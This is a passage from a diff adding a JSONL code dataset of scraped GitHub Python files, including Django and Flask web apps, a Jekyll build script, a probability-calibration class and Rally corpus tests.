diff --git "a/3222.jsonl" "b/3222.jsonl" new file mode 100644--- /dev/null +++ "b/3222.jsonl" @@ -0,0 +1,462 @@ +{"seq_id":"12963939169","text":"from datetime import timedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom ...models import Session\n\n\nclass Command(BaseCommand):\n help = \"Removes session older than 6 hours\"\n\n def handle(self, *args, **options):\n threshold = timezone.now() - timedelta(hours=6)\n\n sessions = Session.objects.filter(last_activity__lt=threshold)\n sessions_deleted = len(sessions)\n sessions.delete()\n\n if sessions_deleted > 1:\n self.stdout.write(self.style.SUCCESS(f\"Removed {sessions_deleted} sessions\"))\n elif sessions_deleted is 1:\n self.stdout.write(self.style.SUCCESS(f\"Removed {sessions_deleted} session\"))\n else:\n self.stdout.write(self.style.WARNING(f\"No sessions to remove\"))\n","repo_name":"LotteSuz/intseconds30","sub_path":"api/management/commands/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74799000080","text":"#Programa que lea el archivo romeo.txt linea a linea y en cada una busque si las palabras coinciden con las que tiene y si no añadirlas. Al final \n#sacar la lista de palabras ordenada\narchivo_romeo = open('romeo.txt')\n\npalabras_unicas = [] #Crear una lista de palabras unicas\nfor linea in archivo_romeo: #Ir recorriendo las lineas en el archivo\n linea.rstrip() #Eliminar los espacios de la derecha\n palabras = linea.split() #Convertir cada linea en una lista de palabras\n for palabra in palabras: #Ir recorriendo las palabras de la lista\n if palabra not in palabras_unicas: #Si la palabra no está repetida guardar en la lista de palabras unicas añadiendola\n palabras_unicas.append(palabra)\n\npalabras_unicas.sort() #Ordenar por orden alfabetico la lista de palabras unicas e imprimir\nprint(palabras_unicas)","repo_name":"AlvaroNavarroFandos/Estructuras-de-datos","sub_path":"Listas/list_palabras_unicas.py","file_name":"list_palabras_unicas.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33690015341","text":"from exceptions.resource_not_found import ResourceNotFound\nfrom Models.classroom import Classroom\nfrom repos.classroom_repo import ClassroomRepo\nfrom dbconnection.dataconnection import connection\n\n\ndef _build_classroom(record):\n if record:\n return Classroom(classroom_id=record[0], title=record[1], price=float(record[2]), start_date=record[3],\n grade=(record[4] if record[4] else 0))\n else:\n return None\n\n\nclass ClassroomRepoImpl(ClassroomRepo):\n\n def create_classroom(self, classroom):\n sql = \"INSERT INTO classrooms VALUES (DEFAULT,%s,%s,DEFAULT,NULL) RETURNING *\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [classroom.title, classroom.price])\n\n connection.commit()\n record = cursor.fetchone()\n\n return _build_classroom(record)\n\n def get_classroom(self, classroom_id):\n\n sql = \"SELECT * FROM classrooms WHERE c_id = %s\"\n cursor = connection.cursor()\n\n cursor.execute(sql, [classroom_id])\n\n record = cursor.fetchone()\n\n if record:\n return _build_classroom(record)\n else:\n raise ResourceNotFound(f\"Classroom with id: {classroom_id} - Not Found\")\n\n def all_classrooms(self):\n sql = \"SELECT * FROM classrooms\"\n cursor = connection.cursor()\n cursor.execute(sql)\n\n records = cursor.fetchall()\n\n classroom_list = [_build_classroom(record) for record in records]\n\n return classroom_list\n\n def update_classroom(self, change):\n sql = \"UPDATE classrooms SET title=%s, price=%s, start_date=%s, course_id=%s WHERE c_id = %s \" \\\n \"RETURNING *\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [change.title, change.price,\n change.start_date, (change.grade if change.grade > 0 else None), change.classroom_id])\n\n connection.commit()\n record = cursor.fetchone()\n\n return _build_classroom(record)\n\n def delete_classroom(self, classroom_id):\n sql = \"DELETE FROM classrooms WHERE c_id = %s\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [classroom_id])\n connection.commit()\n\n\ndef _test():\n cr = ClassroomRepoImpl()\n classroom = cr.get_classroom(1)\n print(classroom)\n\n print(cr.all_classrooms())\n\n classroom = Classroom(title=\"Math 101\", price=505)\n classroom = cr.create_classroom(classroom)\n print(cr.all_classrooms())\n print(\"-----------\")\n classroom.title = \"Math\"\n classroom.price += 1\n classroom = cr.update_classroom(classroom)\n\n print(classroom)\n\n print(\"---SUCCESSFULLY DELETED---\")\n cr.delete_classroom(classroom.classroom_id)\n print(cr.all_classrooms())\n\n\nif __name__ == '__main__':\n _test()\n","repo_name":"Gabito4/Project1","sub_path":"repos/classroom_repo_impl.py","file_name":"classroom_repo_impl.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15351486322","text":"from __future__ import unicode_literals\n\n\nfrom django import VERSION\n\nif VERSION >= (2, 1):\n from django.contrib.auth.views import LoginView\n login = LoginView.as_view()\nelse:\n from django.contrib.auth.views import login\n\nif VERSION < (1, 8): # pragma: nocover\n from django.conf.urls import url, include, patterns\n nsurlpatters = patterns(\n '',\n url(r'^login2$', 'django.contrib.auth.views.login', name='login2_url'),\n )\n\n urlpatterns = patterns(\n '',\n url(r'^login$', 'django.contrib.auth.views.login', name='login_url'),\n url(r'^login/(?P[-_\\w]+)$', 'django.contrib.auth.views.login',\n name='login_args_url'),\n url(r'^login/user/(?P\\S+)$',\n 'django.contrib.auth.views.login',\n name='login_kwargs_url'),\n (r'^ns/', include(nsurlpatters, namespace='ns')),\n )\nelif VERSION < (2, 0):\n from django.conf.urls import url, include\n nsurlpatters = [\n url(r'^login2$', login, name='login2_url'),\n ]\n\n urlpatterns = [\n url(r'^login$', login, name='login_url'),\n url(r'^login/(?P[-_\\w]+)$', login, name='login_args_url'),\n url(r'^login/user/(?P\\S+)$', login, name='login_kwargs_url'),\n url(r'^ns/', include(nsurlpatters, namespace='ns')),\n ]\nelse:\n from django.urls import include, path, re_path\n nsurlpatters = [\n path('login2', login, name='login2_url'),\n ]\n\n urlpatterns = [\n path('login', login, name='login_url'),\n re_path(r'^login/(?P[-_\\w]+)$', login, name='login_args_url'),\n re_path(r'^login/user/(?P\\S+)$', login,\n name='login_kwargs_url'),\n path('ns/', include((nsurlpatters, 'ns'), namespace='ns')),\n ]\n","repo_name":"prymitive/bootstrap-breadcrumbs","sub_path":"tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"3"} +{"seq_id":"18470024932","text":"import calendar, json, urllib2, os, foursquare, datetime\nfrom flask import render_template, request, session, url_for, redirect\nfrom flask_login import login_required, current_user\nfrom app import app\nfrom app import db\nfrom app import forms, datastore, api\nfrom api import foursquare\nfrom forms import EventCreateForm, EventPreferenceForm, EventJoinForm\nfrom datastore import Event, User, attendance, Preference\nfrom sqlalchemy import desc\nfrom passlib.hash import sha256_crypt\nfrom datetime import date\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim()\n\ndef is_attendee_or_host(user, event):\n if user == event.host or user in event.attendees :\n return True\n else :\n return False\n\ndef is_host(user, event): \n if user == event.host : \n return True\n else : \n return False\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if current_user.is_anonymous() : \n return render_template('homepage.html')\n else :\n return redirect('/dashboard')\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n# Dashboard: displays the events the user is either hosting or attending\n@app.route('/dashboard')\n@login_required\ndef dashboard(): \n events_hosting = Event.query.order_by(desc(Event.start_time)).filter(Event.host.has(id=current_user.id)).all()\n events_attending = Event.query.order_by(desc(Event.start_time)).filter(Event.attendees.any(id=current_user.id)).all()\n return render_template('dashboard.html', events_hosting=events_hosting, events_attending=events_attending)\n\n# View Event: displays basic information about an event to host and attendees only\n@app.route('/events/view/')\n@login_required\ndef events_view(event_id):\n event = Event.query.get(event_id)\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n num_preferences = preferences.count()\n # check if this person is an attendee or host\n user_is_host = is_host(current_user, event)\n if is_attendee_or_host(current_user, event) :\n return render_template('events_view.html', event=event, num_preferences=num_preferences, preferences=preferences, is_host=user_is_host, current_user=current_user)\n else :\n return render_template('events_view.html', error='you dunbelong')\n \n# Create Event: allows user to create an event as a host\n@app.route('/events/create', methods=['GET', 'POST'])\n@login_required\ndef events_create():\n form = EventCreateForm(request.form)\n # if form was submitted\n if request.method == 'POST' and form.validate():\n password = sha256_crypt.encrypt(form.password.data) if form.password.data else None\n new_event = Event(name=form.name.data, host=current_user, password=password)\n db.session.add(new_event)\n db.session.commit()\n return render_template('events_create.html', method='post')\n # if form was not submitted (get request)\n elif not form.validate():\n return render_template('events_create.html', method='post', error=form.errors)\n else :\n return render_template('events_create.html', form=form, method='get')\n\n# Delete Event: allows host to delete an event\n@app.route('/events/delete/', methods=['POST'])\n@login_required\ndef events_delete(event_id): \n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n event = Event.query.filter(Event.id == event_id).first()\n if current_user == event.host : \n db.session.delete(event)\n for preference in preferences :\n db.session.delete(preference)\n db.session.commit()\n return redirect(url_for('dashboard'))\n\n# Join Event: allows user to join an event *** TO ADD: PASSWORD TO JOIN ***\n@app.route('/events/join/', methods=['GET', 'POST'])\n@login_required\ndef events_join(event_id):\n form = EventJoinForm(request.form)\n event = Event.query.filter(Event.id == event_id).first()\n # check if current user is already attendee or host\n # if not, add them\n if current_user not in event.attendees and current_user != event.host :\n if request.method == 'POST' and form.validate() :\n if event.password :\n if sha256_crypt.verify(form.password.data, event.password) :\n event.attendees.append(current_user)\n db.session.commit()\n return render_template('events_join.html', event=event, response='you have joined!')\n else :\n return render_template('events_join.html', response='wrong pass yo!')\n else :\n event.attendees.append(current_user)\n db.session.commit()\n return render_template('events_join.html', event=event, response='you have joined!')\n else : \n return render_template('events_join.html', form=form, event=event, event_id=event_id, method='get')\n else :\n return redirect(url_for('events_view', event_id=event_id))\n\n# Leave Event: allows user to leave an event\n@app.route('/events/leave/')\n@login_required\ndef events_leave(event_id):\n preference = Preference.query.filter(Preference.event.has(id=event_id)).filter(Preference.attendee.has(id=current_user.id)).first()\n event = Event.query.filter(Event.id == event_id).first()\n if current_user in event.attendees :\n event.attendees.remove(current_user)\n db.session.delete(preference)\n db.session.commit()\n return render_template('events_leave.html', response='you have been removed!')\n else :\n return render_template('events_leave.html', response='you not even in it yo')\n\n# Event Preferences: allows user to add their preferences for a specific event\n@app.route('/events/preferences/', methods=['GET', 'POST'])\n@login_required\ndef events_preferences(event_id):\n today = date.today()\n form = EventPreferenceForm(request.form)\n event = Event.query.get(event_id)\n\n # check if user is either a host or attendee\n if is_attendee_or_host(current_user, event) :\n # check if a permission already exists\n if Preference.query.filter(Preference.attendee.has(id=current_user.id) & Preference.event.has(id=event_id)).count() != 0 : \n preference = Preference.query.filter(Preference.attendee.has(id=current_user.id) & Preference.event.has(id=event_id)).first()\n available_times = json.loads(preference.availability)\n return render_template('events_preferences.html', response='preference already created')\n else :\n # check to see if the form was submitted\n if request.method == 'POST' and form.validate():\n new_preference = Preference(attendee_id=current_user.id, event_id=event_id, availability=form.availability.data, willing_to_spend=int(form.willing_to_spend.data), location=form.location.data)\n db.session.add(new_preference)\n db.session.commit()\n return render_template('events_preferences.html', response='preference added')\n else :\n return render_template('events_preferences.html', form=form, event_id=event_id, today=today, calendar=calendar)\n else :\n return render_template('events_preferences.html', error='you dont have permission')\n\n# Decide on location and time \n@app.route('/events/decide/', methods=['POST'])\n@login_required\ndef events_decide(event_id):\n location_name = request.form.get('location_name')\n location_address = request.form.get('location_address')\n date = request.form.get('date')\n start_time = request.form.get('start_time')\n end_time = request.form.get('end_time')\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n event = Event.query.filter(Event.id == event_id).first()\n if current_user == event.host : \n if location_name and location_address : \n event.location_name = location_name\n event.location_address = location_address\n if date and start_time and end_time :\n event.date = datetime.datetime.strptime(date, \"%m-%d-%Y\").date()\n event.start_time = datetime.datetime.strptime(start_time, '%H:%M:%S').time()\n event.end_time = datetime.datetime.strptime(end_time, '%H:%M:%S').time()\n db.session.commit()\n return redirect(url_for('dashboard'))\n\n# Analyze Preferences\n@app.route('/events/generate/', methods=['GET', 'POST'])\n@login_required\ndef events_generate(event_id):\n event = Event.query.get(event_id)\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n if preferences.count() > 1:\n possible_dates = {}\n possible_locations = []\n possible_willing_to_spend = []\n \n # Gather preferences and place them into lists/dictionaries we can parse through later\n for preference in preferences :\n # For each preference, load its available dates\n available_dates = json.loads(preference.availability)\n # Add available dates to a dictionary and record the number of people that date works for\n for available_date in available_dates : \n if available_date['date'] in possible_dates :\n possible_dates[available_date['date']]['attendance'] += 1\n if available_date['start_time'] > possible_dates[available_date['date']]['start_time'] :\n possible_dates[available_date['date']]['start_time'] = available_date['start_time']\n if available_date['end_time'] < possible_dates[available_date['date']]['end_time'] :\n possible_dates[available_date['date']]['end_time'] = available_date['end_time']\n else :\n possible_dates[available_date['date']] = {}\n possible_dates[available_date['date']]['attendance'] = 1\n possible_dates[available_date['date']]['start_time'] = available_date['start_time']\n possible_dates[available_date['date']]['end_time'] = available_date['end_time']\n # Get rid of buggy possible dates, like start times after end times\n true_possible_dates = {}\n for possible_date in possible_dates :\n if possible_dates[possible_date]['start_time'] < possible_dates[possible_date]['end_time'] :\n true_possible_dates[possible_date] = possible_dates[possible_date]\n\n possible_dates = true_possible_dates\n possible_willing_to_spend.append(preference.willing_to_spend)\n possible_locations.append(preference.location)\n\n # Get optimal date, first one\n # optimal_date = possible_dates.keys()[0];\n # optimal_date_object = possible_dates[optimal_date]\n # optimal_start_time = optimal_date_object['start_time']\n # optimal_end_time = optimal_date_object['end_time']\n\n # Get optimal willing_to_spend: averages how much everyone is willing to spend\n optimal_willing_to_spend = sum(possible_willing_to_spend)/len(possible_willing_to_spend)\n \n # Get optimal location: average latitude and longitude, return its address\n possible_locations_lat = []\n possible_locations_lng = []\n for possible_location in possible_locations : \n location = geolocator.geocode(possible_location, timeout=20)\n possible_locations_lat.append(location.latitude)\n possible_locations_lng.append(location.longitude)\n optimal_location_latlng = str(sum(possible_locations_lat)/len(possible_locations_lat)) + ', ' + str(sum(possible_locations_lng)/len(possible_locations_lng))\n optimal_location_full = geolocator.reverse(optimal_location_latlng, timeout=25).raw['address']\n if 'postcode' in optimal_location_full.keys() : \n optimal_location = optimal_location_full['postcode']\n elif 'city' in optimal_location_full.keys() : \n optimal_location = optimal_location_full['city']\n else : \n optimal_location = optimal_location_full['county']\n\n possible_venues = foursquare.venues.explore(params={'query': '', 'near': optimal_location, 'limit': '5', 'sortByDistance': '1', 'time': 'any', 'price': optimal_willing_to_spend})['groups'][0]['items']\n return render_template('events_generate.html', possible_venues=possible_venues, possible_times=possible_dates, event=event)\n else : \n return 'no preferences submitted'","repo_name":"cindyyu/shindig","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37881253140","text":"#!/usr/bin/env python3\n'''\nSimple Jekyll site manage script.\n'''\nimport os\nimport sys\nimport time\nimport datetime\nimport signal\nimport argparse\nimport subprocess\nfrom os import system as run\nfrom subprocess import Popen\nimport http.server\nimport socketserver\n\nTIMEZONE = '+0800'\n\nPOST_TEMPLATE =\\\n'''---\nlayout: post\ntitle: {}\ndate: {}\ncategory:\nsummary:\ntypora-root-url: ../\ntypora-copy-images-to: ../media\n---'''\n\ndef open_with_app(filepath):\n '''https://stackoverflow.com/questions/434597/open-document-with-default-application-in-python'''\n if sys.platform.startswith('darwin'):\n subprocess.call(('open', filepath))\n elif os.name == 'nt':\n os.startfile(filepath)\n elif os.name == 'posix':\n subprocess.call(('xdg-open', filepath))\n\ndef create_post(title: str):\n filename = title.replace(' ', '_').lower()\n now = datetime.datetime.now()\n source = POST_TEMPLATE.format(filename, now.strftime('%Y-%m-%d %H:%M:%S '+TIMEZONE))\n filename = now.strftime('%Y-%m-%d-') + filename + '.md'\n path = os.path.join('_posts', filename)\n if not os.path.exists(path):\n with open(path, mode='w', encoding='utf-8') as new:\n new.write(source)\n else:\n print('File {} already exists!'.format(filename))\n open_with_app(path)\n\n\ndef build():\n run('JEKYLL_ENV=production bundle exec jekyll build')\n run('npm run webpack')\n run('sass ./_sass/main.sass ./assets/style.css')\n run('cp -r ./node_modules/han-css/font/ ./assets/fonts/')\n\ndef serve():\n try:\n Popen('npm run webpack -- -w', shell=True)\n Popen('sass --watch ./_sass/main.sass:./assets/style.css', shell=True)\n run('cp -r ./node_modules/han-css/font/ ./assets/fonts/')\n Popen(\"bundle exec jekyll serve\", shell=True).wait()\n finally:\n os.killpg(os.getpid(), signal.SIGTERM)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest='command')\n\n build_parser = subparsers.add_parser('build', help='Build site')\n deploy_parser = subparsers.add_parser('serve', help='Develop server')\n post_parser = subparsers.add_parser('post', help='Create new post.')\n post_parser.add_argument('title')\n\n args = parser.parse_args()\n if args.command == 'post':\n create_post(args.title)\n elif args.command == 'build':\n build()\n elif args.command == 'serve':\n serve()\n\nif __name__ == '__main__':\n main()\n","repo_name":"tioover/ioover-blog","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38301936868","text":"import numpy as np\nimport pandas as pd\nimport plotnine as p9\nfrom typing import Iterable, Self, Optional\nfrom sklearn.base import BaseEstimator\nfrom sklearn.isotonic import IsotonicRegression\nfrom cuppa.components.passthrough import PassthroughRegression\nfrom cuppa.misc.utils import max_col\nfrom cuppa.misc.plotting import PlotnineFigExporter\nfrom cuppa.logger import LoggerMixin\n\n\nclass RollingAvgCalibration(BaseEstimator, LoggerMixin):\n \"\"\"\n Modified probability calibration approach based on isotonic regression\n\n Given:\n - an array of probabilities\n - an array of booleans, indicating whether a sample belongs to a cancer type\n\n Perform the following steps:\n - Sort both arrays by the probabilities\n - Slide a window along the boolean array and take the mean of the values in the window at each step\n - Fit an isotonic regression, with the x-values being the probabilities and y-values being the sliding window means\n\n This approach results in more granular y-values, which improves the isotonic regression fit\n\n Parameters\n ----------\n min_true_samples: int\n Minimum number of samples of the target cancer type required to perform the\n calibration. Cancer types with fewer samples than this value will simply have the uncalibrated probabilities\n returned\n\n window_size: int or 'variable'\n Size of the window (number of samples)\n\n kernel: 'uniform' or 'gaussian'\n 'uniform': mean of the sliding window. 'gaussian': weighted mean where the center has more weight than the\n edges\n\n edge_weight: float\n Only when kernel='gaussian'. Higher values place more weight on the edges\n\n n_true_exponent: float\n Only when window_size='variable'. Automatic calculation of the window size based on the formula:\n int(round(n_true_samples ** n_true_exponent))\n\n Higher values result in wider windows\n\n save_coords: bool\n Save the probabilities and the rolling average values within each `calibrator` object in\n `self.calibrators`\n\n bypass: bool\n If True, raw probabilities will be returned upon prediction time (i.e. calibration will be bypassed)\n\n \"\"\"\n\n def __init__(\n self,\n min_true_samples: int = None,\n window_size: int | str = 50,\n kernel: str = \"gaussian\",\n edge_weight: float = 0.16,\n n_true_exponent: float = 0.7,\n save_coords: bool = False,\n bypass: bool = False\n ):\n self.min_true_samples = min_true_samples\n self.window_size = window_size\n self.edge_weight = edge_weight\n self.n_true_exponent = n_true_exponent\n self.kernel = kernel\n self.save_coords = save_coords\n self.bypass = bypass\n\n ## Kernel ================================\n def _auto_calc_window_size(self, n_true_samples: int, n_true_exponent: float):\n return int(round(n_true_samples ** n_true_exponent))\n\n def _gaussian_kernel(self, window_size=50, edge_weight=0.16):\n\n def _normal_dist(x, mean, sd):\n ## Norm dist formula from\n ## https://www.askpython.com/python/normal-distribution\n return (np.pi * sd) * np.exp(-0.5 * ((x - mean) / sd) ** 2)\n\n weights = _normal_dist(\n x = np.array(range(1, window_size + 1)),\n mean = window_size / 2,\n sd = window_size * edge_weight ## Higher edge_weight values put more weight on indexes near the edge\n )\n weights = weights / np.sum(weights)\n\n return weights\n\n def _get_kernel_func(self, kernel, window_size: int = None, edge_weight: float = None):\n if kernel == \"uniform\":\n func = np.mean\n\n elif kernel == \"gaussian\":\n window_weights = self._gaussian_kernel(window_size=window_size, edge_weight=edge_weight)\n func = lambda x: np.sum(x * window_weights)\n\n else:\n self.logger.error(\"`kernel` must be 'gaussian' or 'uniform'\")\n raise ValueError\n\n return func\n\n ## Main ================================\n def _fit_one_calibrator(\n self,\n probs: Iterable[float],\n bools: Iterable[bool],\n min_true_samples: int = None,\n window_size: str | int = \"variable\",\n n_true_exponent: float = 0.7,\n edge_weight: float = 0.16,\n kernel: str = \"gaussian\",\n save_coords: bool = False\n ) -> IsotonicRegression | PassthroughRegression:\n\n ## Checks --------------------------------\n probs = np.array(probs)\n bools = np.array(bools)\n n_true_samples = sum(bools)\n\n if probs.ndim != 1:\n self.logger.error(\"`probs` must be an 1d array\")\n raise TypeError\n\n if bools.ndim != 1 or bools.dtype != \"bool\":\n self.logger.error(\"`bool` must be an 1d boolean array\")\n raise TypeError\n\n if edge_weight <= 0:\n self.logger.error(\"`edge_weight` must be >0\")\n raise ValueError\n\n if not isinstance(window_size, str) and window_size <= 0:\n self.logger.error(\"`window_size` must be >0\")\n raise ValueError\n\n ## Prepare kernel --------------------------------\n if window_size == \"variable\":\n window_size = self._auto_calc_window_size(n_true_samples=n_true_samples, n_true_exponent=n_true_exponent)\n\n kernel_func = self._get_kernel_func(kernel=kernel, window_size=window_size, edge_weight=edge_weight)\n\n ## Main --------------------------------\n ## Sort data by prob\n coords = pd.DataFrame(dict(bool=bools, prob=probs), index=None)\n coords.sort_values(\"prob\", ascending=False, inplace=True)\n\n ## Ignore calibration if there are not enough samples\n if min_true_samples is not None and n_true_samples < min_true_samples:\n calibrator = PassthroughRegression()\n\n else:\n ## Add padding to bool array to handle kernel going beyond edges\n bool_padded = np.concatenate([\n np.ones(window_size),\n coords[\"bool\"],\n np.zeros(window_size)\n ])\n\n ## Rolling averages to smooth out bool array\n avgs = pd.Series(bool_padded).rolling(window=window_size, center=True).apply(kernel_func)\n\n ## Discard padding\n n_samples = len(bools)\n avgs = avgs[window_size:(window_size + n_samples)]\n\n coords[\"avg\"] = avgs.values\n\n calibrator = IsotonicRegression(out_of_bounds=\"clip\")\n calibrator.fit(coords[\"prob\"], coords[\"avg\"])\n\n ## Store training x,y coords for debugging\n if save_coords:\n calibrator.coords = coords\n\n return calibrator\n\n def fit(self, X: pd.DataFrame, y: pd.Series) -> Self:\n \"\"\"\n\n Parameters\n ----------\n X: pandas DataFrame\n Probabilities for each sample (row) and cancer type (columns)\n\n y: pandas Series of type str or Categorical\n Cancer type labels for each sample\n\n Returns\n -------\n self\n fitted estimator\n \"\"\"\n if not isinstance(X, pd.DataFrame):\n self.logger.error(\"`X` must be a pandas dataframe\")\n raise ValueError\n\n calibrators = {}\n for class_i in np.unique(y):\n calibrator_i = self._fit_one_calibrator(\n X[class_i],\n y==class_i,\n min_true_samples = self.min_true_samples,\n window_size = self.window_size,\n edge_weight = self.edge_weight,\n n_true_exponent = self.n_true_exponent,\n kernel = self.kernel,\n save_coords = self.save_coords\n )\n calibrators[class_i] = calibrator_i\n\n self.calibrators = calibrators\n\n return self\n\n def predict_proba(self, X: pd.DataFrame, normalize: bool = True) -> pd.DataFrame:\n\n if self.bypass or X.shape[0] == 0:\n return X\n\n if not isinstance(X, pd.DataFrame):\n self.logger.error(\"`X` must be a pandas dataframe\")\n raise ValueError\n\n probs_cal = {}\n for class_name in X.columns:\n calibrator = self.calibrators[class_name]\n probs_cal[class_name] = calibrator.predict(X[class_name])\n\n probs_cal = pd.DataFrame(probs_cal, index=X.index)\n\n if normalize:\n ## Scale probs from 0 to 1\n probs_cal = probs_cal.T / np.sum(probs_cal, axis=1)\n probs_cal = probs_cal.T\n\n return probs_cal\n\n def predict(self, X: pd.DataFrame, y: pd.Series = None) -> pd.Series:\n return max_col(self.predict_proba(X))\n\n def transform(self, X: pd.DataFrame, y: pd.Series = None) -> pd.DataFrame:\n return self.predict_proba(X)\n\n def fit_transform(self, X: pd.DataFrame, y: pd.Series) -> pd.DataFrame:\n return self.fit(X, y).transform(X)\n\n def set_output(self, transform: str = None) -> Self:\n return self\n\n # Calibration curves ================================\n def get_cal_curves(self, x_resolution=500, long_format=True) -> pd.DataFrame:\n\n ## Get y values\n x_values = np.linspace(0, 1, x_resolution + 1)\n\n cal_curves = {\n class_name: calibrator.predict(x_values)\n for class_name, calibrator in self.calibrators.items()\n }\n\n ## Wide format with x values as first col\n cal_curves = pd.DataFrame(cal_curves)\n cal_curves[\"x\"] = x_values\n\n if long_format:\n cal_curves = cal_curves.melt(id_vars=\"x\", var_name=\"class\", value_name=\"y\")\n cal_curves = cal_curves[['class', 'x', 'y']]\n\n return cal_curves\n\n def plot_cal_curves(\n self,\n path: Optional[str] = None,\n width: int | float = 20,\n height: int | float = 15,\n dpi: int = 300,\n facet_ncol: Optional[int] = None\n ):\n\n cal_curves = self.get_cal_curves()\n\n has_groups = \"group\" in cal_curves.columns\n\n fig = (\n p9.ggplot(cal_curves, p9.aes(x=\"x\", y=\"y\"))\n + p9.facet_wrap(\"class\", ncol=facet_ncol)\n + (p9.geom_path(p9.aes(color=\"group\", group=\"group\")) if has_groups else p9.geom_path())\n + p9.labs(x=\"Input probability\", y=\"Calibrated probability\")\n + p9.theme_bw()\n + p9.theme(panel_grid_minor=p9.element_blank())\n ).draw(show=False, return_ggplot=False)\n\n ## Export\n fig_exporter = PlotnineFigExporter(width=width, height=height, dpi=dpi)\n fig_exporter.export(fig, path)\n","repo_name":"hartwigmedical/hmftools","sub_path":"cuppa/src/main/python/pycuppa/cuppa/components/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"3"} +{"seq_id":"8803076683","text":"# for saving figures\nEXT = '.png'\n# EXT = '.eps'\n\n# calcsfh output file naming schemes\nOUTEXT = '.out'\nSCRNEXT = '.scrn'\nPHOTEXT = '.match'\nFAKEEXT = '.matchfake'\nPARAMEXT = '.param'\n\nmatch_base = '$HOME/match2.6/'\ncalcsfh = \"$HOME/match2.6/bin/calcsfh\"\ncalcsfh_flag = \"-PARSEC -dT=0.01 -dZ=0.05 -ssp -full -dAvy=0.0\"\n# calcsfh_flag = \"-MIST -dT=0.01 -dZ=0.01 -ssp -full -dAvy=0.0\"\n","repo_name":"philrosenfield/match","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"31929829816","text":"from esrally.track import DocumentCorpus, Documents, Track\nfrom shared.utils.corpus import (\n bounds,\n calculate_corpus_counts,\n calculate_integration_ratios,\n convert_to_gib,\n)\nfrom shared.utils.track import generate_track_id\nfrom tests.parameter_sources import StaticTrack\n\n\ndef test_generate_track_id():\n corpus = DocumentCorpus(\n name=\"system-logs\",\n documents=[\n Documents(\n \"bulk\",\n document_file=\"./data/logs-system.syslog-default.json\",\n number_of_documents=19637,\n uncompressed_size_in_bytes=26128253,\n target_index=\"logs-system.syslog-default\",\n )\n ],\n )\n track = Track(\"test_track\", corpora=[corpus])\n assert generate_track_id(track) == generate_track_id(track)\n\n\ndef test_corpus_count_calculation():\n counts = calculate_corpus_counts(\n {\n \"system-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 10.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 10.0,\n },\n \"agent-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 20.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 20.0,\n },\n },\n {\"system-logs\": 0.5, \"agent-logs\": 0.5},\n 10,\n max_generation_size_gb=10,\n )\n assert counts[\"system-logs\"] == 3495254\n assert counts[\"agent-logs\"] == 6990507\n\n\ndef test_corpus_count_calculation_unlimited():\n counts = calculate_corpus_counts(\n {\n \"system-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 10.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 10.0,\n },\n \"agent-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 20.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 20.0,\n },\n },\n {\"system-logs\": 0.5, \"agent-logs\": 0.5},\n 10,\n )\n assert counts[\"system-logs\"] == 52428800\n assert counts[\"agent-logs\"] == 104857600\n\n\ndef test_corpus_ratio_calculation():\n ratios = calculate_integration_ratios({\"system-logs\": 75, \"agent-logs\": 25})\n assert ratios[\"system-logs\"] == 0.75\n assert ratios[\"agent-logs\"] == 0.25\n\n\ndef test_bounds_calculation():\n offset, docs = bounds(10, 0, 2)\n assert offset == 0\n assert docs == 5\n offset, docs = bounds(10, 1, 2)\n assert offset == 5\n assert docs == 5\n offset, docs = bounds(10, 0, 3)\n assert offset == 0\n assert docs == 3\n offset, docs = bounds(10, 1, 3)\n assert offset == 3\n assert docs == 3\n offset, docs = bounds(10, 2, 3)\n assert offset == 6\n assert docs == 4\n\n\ndef test_even_bounds_calculation():\n offset, docs = bounds(10, 0, 3)\n assert offset == 0\n assert docs == 3\n offset, docs = bounds(100, 0, 3, ensure_even=True)\n assert offset == 0\n assert docs == 34\n offset, docs = bounds(100, 1, 3, ensure_even=True)\n assert offset == 34\n assert docs == 34\n offset, docs = bounds(100, 2, 3, ensure_even=True)\n assert offset == 68\n assert docs == 32\n\n\ndef 